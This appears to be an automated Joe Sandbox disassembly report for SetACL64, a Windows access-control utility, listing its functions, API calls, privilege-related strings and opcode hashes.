Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
String ID: SeSecurityPrivilege
API String ID: 3247214862-2333288578
Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
Instruction ID: edb9810a3074a850746ac64d15d38870c9d3946d00b1f313f91ea40711b06da2
Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
Instruction Fuzzy Hash: FA42A1A2B19742C6FB149B65D4483AD23A2FF44B88F404139DB4E97BA5DF7EE890C350

Function 00007FF686843A5E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686843A86
GetLastError.KERNEL32 ref: 00007FF686843A90
CloseHandle.KERNELBASE ref: 00007FF686843A9F
GetLastError.KERNEL32 ref: 00007FF686843AA9
CloseHandle.KERNEL32 ref: 00007FF686843AB6
GetCurrentProcess.KERNEL32 ref: 00007FF686843CC0
OpenProcessToken.ADVAPI32 ref: 00007FF686843CD3
GetLastError.KERNEL32 ref: 00007FF686843CDD

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843B7A
Prepare, xrefs: 00007FF686843BAA, 00007FF686843E67, 00007FF686844124
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39
SeRestorePrivilege, xrefs: 00007FF686843C7C

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 637398405-1541018277
Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction ID: 7297aa4543ed2d95f5a876edb80cd7939455c8c289724e75e36796354c795d8c
Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
Instruction Fuzzy Hash: ED22A5B2A18782C2EE10CB55E4483696365FF847E4F505139E69D87AE9DFBEE880C710

Function 00007FF68685E4B0 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSidToSidW.ADVAPI32 ref: 00007FF68685E511
LocalFree.KERNEL32 ref: 00007FF68685E52E
DsGetDcNameW.NETAPI32 ref: 00007FF68685E891
NetApiBufferFree.NETAPI32 ref: 00007FF68685E90B

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

Part of subcall function 00007FF68685F3C0: LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
Part of subcall function 00007FF68685F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
Part of subcall function 00007FF68685F3C0: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EBEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EBFB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC01
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685EC19

Strings

computername, xrefs: 00007FF68685E73B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
String ID: computername
API String ID: 1703289946-1800712684
Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction ID: 898f2eeaf6843ea59616fa1c987da8b1c1ca5a90c25562f0e3334e17b6b24c0e
Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
Instruction Fuzzy Hash: E72290A2B14B52C6FB008B68E84D3AD2371BF44798F405639DE5E97AD9DF39E841C320

Function 00007FF686843D1B Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686843D43
GetLastError.KERNEL32 ref: 00007FF686843D4D
CloseHandle.KERNEL32 ref: 00007FF686843D5C
GetLastError.KERNEL32 ref: 00007FF686843D66
CloseHandle.KERNEL32 ref: 00007FF686843D73
GetCurrentProcess.KERNEL32 ref: 00007FF686843F7D
OpenProcessToken.ADVAPI32 ref: 00007FF686843F90
GetLastError.KERNEL32 ref: 00007FF686843F9A

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
Prepare, xrefs: 00007FF686843E67, 00007FF686844124
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
API String ID: 637398405-1701055250
Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction ID: d6ebd7ad4d04b0742e7c3d1876236b290937e98c7a16907e16e8ffb0d61cd811
Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
Instruction Fuzzy Hash: ACE1A2B2B18786C2EE10CB55E4483696365FF847E4F505139EA5D87AE8DFBEE880C710

Function 00007FF686843FD8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF686844000
GetLastError.KERNEL32 ref: 00007FF68684400A
CloseHandle.KERNEL32 ref: 00007FF686844019
GetLastError.KERNEL32 ref: 00007FF686844023
CloseHandle.KERNEL32 ref: 00007FF686844030

Strings

Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
Prepare, xrefs: 00007FF686844124

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseErrorHandleLast$AdjustPrivilegesToken
String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
API String ID: 1992325626-2245062721
Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction ID: 17c5320fa135c33c8e6c1b2a4bae653178f06b8b82d40f068ecf13cb63e997f2
Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction Fuzzy Hash: 8DA19FB2B18786C2EA24CB55E0483A96365FF84BE4F405139DA5D876E4DFBEE880C710

Function 00007FF686876C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11

TranslateName.LIBCMT ref: 00007FF686876CAD
TranslateName.LIBCMT ref: 00007FF686876CE8
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF686869674), ref: 00007FF686876D2D
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF686869674), ref: 00007FF686876D55

Strings

utf8, xrefs: 00007FF686876E39

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
Instruction ID: 9c102d64d270edf609c833b25d11542124b4314424bb4e8ea6a0ac4bf71eceeb
Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
Instruction Fuzzy Hash: C9919AB2B08746C6EB209F21D840AA927B4FF85B84F544039DA4D87796DF7EED91C720

Function 00007FF6868213F0 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExW.KERNELBASE ref: 00007FF6868213FB
CreateEventW.KERNEL32 ref: 00007FF686821412
CreateEventW.KERNEL32 ref: 00007FF686821429

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Create$Event$Mutex
String ID:
API String ID: 646228171-0
Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction ID: 483f1282f2341bf1f79c2d7af73d9d32fde9014bd7fad07d434caa21cf24570a
Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction Fuzzy Hash: 9A015EB1D28A52C2F314CB28BC5A7293691BF98311F505A3DD94DA59E0DF7F2440D721

Function 00007FF68687B74C Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF68687B7F1

Part of subcall function 00007FF686874FDC: HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031

Part of subcall function 00007FF686875054: HeapFree.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,00005D604750197C,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687506A
Part of subcall function 00007FF686875054: GetLastError.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,00005D604750197C,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687507C

Part of subcall function 00007FF686880AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686880B0E

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
Instruction ID: 81d752a16e4d376267d6bd1060c03394d73072050616f1b6b0d350226d8d51de
Opcode Fuzzy Hash: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
Instruction Fuzzy Hash: 7E4196A1B0D28785E6609E566461BBA66A3BF857C4F14413DEF4D8BB81DE3EEC01C720

Function 00007FF686843A20 Relevance: 47.8, APIs: 21, Strings: 6, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF686843A20
GetCurrentProcess.KERNEL32 ref: 00007FF686843CC0
OpenProcessToken.ADVAPI32 ref: 00007FF686843CD3
GetLastError.KERNEL32 ref: 00007FF686843CDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684442B

Strings

Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843B7A
Prepare, xrefs: 00007FF686843BAA, 00007FF686843E67, 00007FF686844124
SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39
SeRestorePrivilege, xrefs: 00007FF686843C7C

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 6815931-1541018277
Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
Instruction ID: d3aeac8cba9e603a5d0f1641d2f012f4b63d9029f6ca9353756cfe1e6f409ec1
Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
Instruction Fuzzy Hash: 0122B5F2A19782C2EE108B59E04836D6365FF857E4F405139E65D87AE9DFBEE880C710

Function 00007FF686842DCB Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843509

Part of subcall function 00007FF68684B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812

Part of subcall function 00007FF686829520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686829606
Part of subcall function 00007FF686829520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68682960C

Strings

/, xrefs: 00007FF686843481
read, xrefs: 00007FF686844AAB
SetACL finished successfully., xrefs: 00007FF686843325
Run, xrefs: 00007FF6868430B5, 00007FF686843375
Prepare, xrefs: 00007FF6868435A1
Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset., xrefs: 00007FF68684307E
Object path and/or object type not specified., xrefs: 00007FF686843573

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
API String ID: 1222371136-710240214
Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction ID: a746cacaaaafb389c668c461b4964444e1aa38cca4b16b824fc192f3d3691853
Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction Fuzzy Hash: D632E2A2B1D782C6EA24DB25D0853BE6365FF45780F40413AE65D876D6DFBEE840C720

Function 00007FF686857715 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 600registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF686857A14
GetLastError.KERNEL32 ref: 00007FF686857A35
CloseHandle.KERNEL32 ref: 00007FF686857B52
RegCloseKey.ADVAPI32 ref: 00007FF686857B62
SetSecurityInfo.ADVAPI32 ref: 00007FF686857C29

Part of subcall function 00007FF6868342A0: GetCurrentProcess.KERNEL32 ref: 00007FF6868342DA
Part of subcall function 00007FF6868342A0: OpenProcessToken.ADVAPI32 ref: 00007FF6868342EC
Part of subcall function 00007FF6868342A0: GetLastError.KERNEL32 ref: 00007FF6868342F6

NetShareGetInfo.NETAPI32 ref: 00007FF686857DD6
NetApiBufferFree.NETAPI32 ref: 00007FF686857E10
SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF686857E5D
NetShareSetInfo.NETAPI32 ref: 00007FF686857EDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FE2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FE8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FEE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857FF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686858000
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686858006

Strings

SeSecurityPrivilege, xrefs: 00007FF686857749

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
String ID: SeSecurityPrivilege
API String ID: 4200377542-2333288578
Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
Instruction ID: 35b28d8166c50361eac63c5d4dc8efe04d8e99683064944ed3fb8332635ddf5f
Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
Instruction Fuzzy Hash: 884262A2A18782C5EB10CF25D4587AD23A1FF44798F508139DB5E87AD9DF7EE980C360

Function 00007FF68683DA7F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32 ref: 00007FF68683DA89
ReleaseMutex.KERNEL32 ref: 00007FF68683DA9D
EnterCriticalSection.KERNEL32 ref: 00007FF68683DACF

Strings

UNKNW,, xrefs: 00007FF68683DBDF
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalEnterEventMutexReleaseSection
String ID: %s$UNKNW,
API String ID: 995701069-1666316639
Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
Instruction ID: 0410017a460c161042bf2ef77a2c7031cb725082661a18f3f957704836942e76
Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
Instruction Fuzzy Hash: AF5191E2A19A86C1EA04DB25D59837D2362FF44B84F415439CA1D8B7A2DF7EEC44C320

Function 00007FF68683D304 Relevance: 16.8, APIs: 11, Instructions: 288
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68683D335
GetCurrentThreadId.KERNEL32 ref: 00007FF68683D35F
GetUserNameExW.SECUR32 ref: 00007FF68683D39C
GetLastError.KERNEL32 ref: 00007FF68683D3A6
GetUserNameExW.SECUR32 ref: 00007FF68683D3DC
GetLastError.KERNEL32 ref: 00007FF68683D3E6
LeaveCriticalSection.KERNEL32 ref: 00007FF68683D52A

Part of subcall function 00007FF68683EA60: WaitForSingleObject.KERNEL32 ref: 00007FF68683EA79
Part of subcall function 00007FF68683EA60: ResetEvent.KERNEL32 ref: 00007FF68683EABC
Part of subcall function 00007FF68683EA60: ReleaseMutex.KERNEL32 ref: 00007FF68683EAC6
Part of subcall function 00007FF68683EA60: SetEvent.KERNEL32 ref: 00007FF68683EAD0

LeaveCriticalSection.KERNEL32 ref: 00007FF68683D662

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
